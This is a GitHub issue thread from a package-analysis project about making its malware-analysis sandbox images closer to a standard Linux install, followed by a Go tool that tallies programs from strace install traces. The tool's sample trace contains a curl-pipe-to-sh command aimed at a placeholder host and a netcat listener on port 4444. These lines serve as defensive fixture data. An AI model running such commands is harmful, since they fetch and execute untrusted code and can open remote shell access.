ossf / package-analysis

Open Source Package Analysis
Apache License 2.0

Make the images used for dynamic analysis more representative of a standard Linux install #146

Open calebbrown opened 3 years ago

calebbrown commented 3 years ago

Currently the base images used are the *-slim variants.

To ensure we capture common attack scenarios, the base images should include things like:

Other nice-to-haves might be:

oliverchang commented 3 years ago

Yes!

One technical issue I've encountered though is that storing large images in the base analysis image is really slow. We might need to find a better way to run these analysis images.

calebbrown commented 3 years ago

There are a few options here:

  1. pull all the images when each worker pod starts
  2. pull the images the first time they are needed (this is basically how it works now, but it happens during the podman run step)
  3. build analysis images for each ecosystem with the sandbox image baked in, and have different k8s clusters for different ecosystems.

My preference would be for 2 as it trades off the startup latency against the ability to pull in larger images.

oliverchang commented 3 years ago

I agree 2 would be ideal, but I noticed a lot of slowness with pulling on demand that we'd have to solve (taking several minutes even with the current size of images). Maybe the filesystem overlay or some other configuration is not set up optimally for this.

naveensrinivasan commented 3 years ago

Won't this help? https://cloud.google.com/blog/products/containers-kubernetes/introducing-container-image-streaming-in-gke

oliverchang commented 3 years ago

Thanks @naveensrinivasan, that looks interesting, but I'm unsure of how easily this works with our setup and nested containers.

To make 2) work, one thing to explore might be to set up a persistent SSD storage for our workers (and mount that into /var/lib/containers or wherever podman stores images) which might make pulling both faster and allow caching.

oliverchang commented 3 years ago

Some packages also fail to install properly because our image is too minimal.

e.g. @brixel/brixel-components@2.6.57 requires git:

    2021-11-25 00:04:16.180 GMT npm ERR! code ENOENT
    2021-11-25 00:04:16.180 GMT npm ERR! syscall spawn git
    2021-11-25 00:04:16.180 GMT npm ERR! path git
    2021-11-25 00:04:16.180 GMT npm ERR! errno -2
    2021-11-25 00:04:16.180 GMT npm ERR! enoent spawn git ENOENT
    2021-11-25 00:04:16.180 GMT npm ERR! enoent This is related to npm not being able to find a file.
    2021-11-25 00:04:16.180 GMT npm ERR! enoent

calebbrown commented 2 years ago

Now available in sandbox images:

maxfisher-g commented 1 year ago

There is also sudo now in all sandbox images #395

calebbrown commented 1 year ago

It is unclear when this issue can be marked as complete.

At the very least the images should not be "slim" variants, but more full ubuntu server or workstation variants.

maxfisher-g commented 1 year ago

Some other small things to add - netcat, ip tools.

Need someone to make a list based on examining commands executed by packages and what programs they try to access.
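One way to build that list, as an added example that is not part of the issue thread or the project's own code: fold an `execve` trace of a package install (the shape `strace -f -e trace=execve` prints), plus any `npm ERR! enoent spawn X ENOENT` lines from the install log, into a per-program tally. A program whose every `execve` returned `ENOENT` and never succeeded is one the package wanted but the image does not provide, which is exactly the candidate list for fattening the sandbox image. The trace below is constructed for the example (the `git` failure mirrors the `@brixel/brixel-components` error earlier in the thread, `nc` the netcat suggestion); the pids, paths and package name in it are invented.

```go
package main

import (
	"bufio"
	"fmt"
	"path"
	"regexp"
	"sort"
	"strings"
)

// ProgramUsage summarises every execve attempt for one program name. The
// name is the basename of the execve path, so the PATH walk that execvp does
// for a missing binary collapses into a single entry.
type ProgramUsage struct {
	Name      string
	Succeeded int // execve returned 0
	Enoent    int // execve returned -1 ENOENT (that candidate path is absent)
}

// Missing is true when the package tried to run the program but no execve of
// it ever succeeded: the binary is on no PATH entry in the image.
func (u ProgramUsage) Missing() bool { return u.Succeeded == 0 && u.Enoent > 0 }

// execveRE matches one strace execve line: path, return value, optional errno.
var execveRE = regexp.MustCompile(`execve\("([^"]+)".*\)\s*=\s*(-?\d+)(?:\s+(E[A-Z0-9]+))?`)

// npmSpawnRE matches npm's own report of a child process it could not spawn.
var npmSpawnRE = regexp.MustCompile(`npm ERR! enoent spawn (\S+) ENOENT`)

// AnalyzeTrace tallies strace execve lines (possibly interleaved with npm
// error output) per program, sorted by program name.
func AnalyzeTrace(trace string) []ProgramUsage {
	byName := map[string]*ProgramUsage{}
	get := func(name string) *ProgramUsage {
		u, ok := byName[name]
		if !ok {
			u = &ProgramUsage{Name: name}
			byName[name] = u
		}
		return u
	}
	sc := bufio.NewScanner(strings.NewReader(trace))
	for sc.Scan() {
		line := sc.Text()
		if m := execveRE.FindStringSubmatch(line); m != nil {
			u := get(path.Base(m[1]))
			switch {
			case m[2] == "0":
				u.Succeeded++
			case m[3] == "ENOENT":
				u.Enoent++
			}
			continue
		}
		if m := npmSpawnRE.FindStringSubmatch(line); m != nil {
			// npm already walked PATH for us; count the report as one failed attempt.
			get(m[1]).Enoent++
		}
	}
	out := make([]ProgramUsage, 0, len(byName))
	for _, u := range byName {
		out = append(out, *u)
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Name < out[j].Name })
	return out
}

// MissingPrograms returns the names a package tried to execute but the image
// does not provide, in name order.
func MissingPrograms(usages []ProgramUsage) []string {
	var missing []string
	for _, u := range usages {
		if u.Missing() {
			missing = append(missing, u.Name)
		}
	}
	return missing
}

// sampleTrace is a constructed, abbreviated install trace, not project output.
const sampleTrace = `[pid  1001] execve("/usr/bin/node", ["node", "scripts/postinstall.js"], 0x7ffd1a2b3c40 /* 14 vars */) = 0
[pid  1002] execve("/usr/local/sbin/git", ["git", "ls-remote", "https://example.invalid/r.git"], 0x55aa12345678 /* 14 vars */) = -1 ENOENT (No such file or directory)
[pid  1002] execve("/usr/local/bin/git", ["git", "ls-remote", "https://example.invalid/r.git"], 0x55aa12345678 /* 14 vars */) = -1 ENOENT (No such file or directory)
[pid  1002] execve("/usr/bin/git", ["git", "ls-remote", "https://example.invalid/r.git"], 0x55aa12345678 /* 14 vars */) = -1 ENOENT (No such file or directory)
[pid  1002] execve("/bin/git", ["git", "ls-remote", "https://example.invalid/r.git"], 0x55aa12345678 /* 14 vars */) = -1 ENOENT (No such file or directory)
[pid  1003] execve("/bin/sh", ["sh", "-c", "curl -s https://example.invalid/s | sh"], 0x55aa12345678 /* 14 vars */) = 0
[pid  1004] execve("/usr/bin/curl", ["curl", "-s", "https://example.invalid/s"], 0x55aa12345678 /* 14 vars */) = 0
[pid  1005] execve("/usr/local/bin/nc", ["nc", "-l", "-p", "4444"], 0x55aa12345678 /* 14 vars */) = -1 ENOENT (No such file or directory)
[pid  1005] execve("/usr/bin/nc", ["nc", "-l", "-p", "4444"], 0x55aa12345678 /* 14 vars */) = -1 ENOENT (No such file or directory)
npm ERR! code ENOENT
npm ERR! syscall spawn git
npm ERR! enoent spawn git ENOENT`

func main() {
	usages := AnalyzeTrace(sampleTrace)
	for _, u := range usages {
		fmt.Printf("%-6s ok=%d enoent=%d missing=%v\n", u.Name, u.Succeeded, u.Enoent, u.Missing())
	}
	fmt.Println("missing from image:", MissingPrograms(usages))
}
```

Run over many packages' traces and merge the tallies, the `Missing()` set ranks which binaries to add first, while the successful entries (`sh`, `curl`, `node` here) show which tools packages already rely on and therefore must stay in any "fuller" image.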